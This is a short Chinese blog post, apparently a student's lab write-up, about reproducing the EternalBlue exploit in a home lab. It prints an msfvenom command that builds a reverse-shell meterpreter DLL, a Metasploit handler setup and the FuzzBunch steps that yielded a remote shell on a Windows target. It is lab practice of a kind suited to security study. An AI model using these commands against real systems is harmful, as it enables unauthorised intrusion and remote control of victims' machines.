前言

昨天去学长公司了,在公司呆了一下午。其间学长的同事让我复现下方程式Eternalblue,但是由于我没有带电脑所以没有在那边进行复现。Eternalblue之前我是有复现过的,那时候是用吐司上别人发的MSF集成的脚本。但是好像是成功了,回来打开KALI还看到之前的成功记录。这次再次进行一次复现,在这个过程中,一开始我是按照学长同事给的freebuf上的一篇文章来的,但是我最初下载的Empire是最新版的,然后在配置listeners的过程中出现错误,不能配置。无奈在他人的提醒下下载了1.6版本但是由于之前安装了最新版的问题,1.6无法安装。所以只能直接用msf进行监听了。

正文

环境准备

攻击机

1
2
3
4
5
6
攻击机 : 10.15.17.215
win7 32bit 旗舰版
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win32-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

监听机

1
2
监听机 : 10.15.198.65
KALI

靶机

1
2
靶机 : 10.15.251.226
win 64bit en 旗舰版

复现过程

生成DLL文件

  • 在KALI下生成s.dll到apache目录下

    1
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.15.198.65 LPORT=5555 -f dll > /var/www/html/s.dll
  • 启动apache服务

    1
    service apache2 start

设置监听

1
2
3
4
5
use exploit/mulit/handler
set LHOST 10.15.198.65
set LPORT 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

配置攻击脚本

  • 运行fb.py 配置攻击脚本
  • 访问KALI的web服务器下载s.dll文件复制到C盘目录
  • 加载DLL

操作监听机

  • Msf里成功收到一个shell
  • getuid
  • ipconfig


之前的复现图

附上之前利用msf集成exp脚本测试图。


结语

昨天回来后休息了一会,然后才开始复现的,等我把环境配置好的时候已经断网了。Empire最新版无法配置listeners的问题一直没有解决。早上下载1.6版本有出现了错误,需要删除最新版。但是Empire是利用.sh安装的,想要卸载干净不是那么简单的。再加上我的KALI没有快照不能还原,无奈只能直接利用MSF,不能按照freebuf上的文章进行复现。然后自己的电脑也比较渣,开三个虚拟机一卡一卡的,陆陆续续才完成这个复现过程。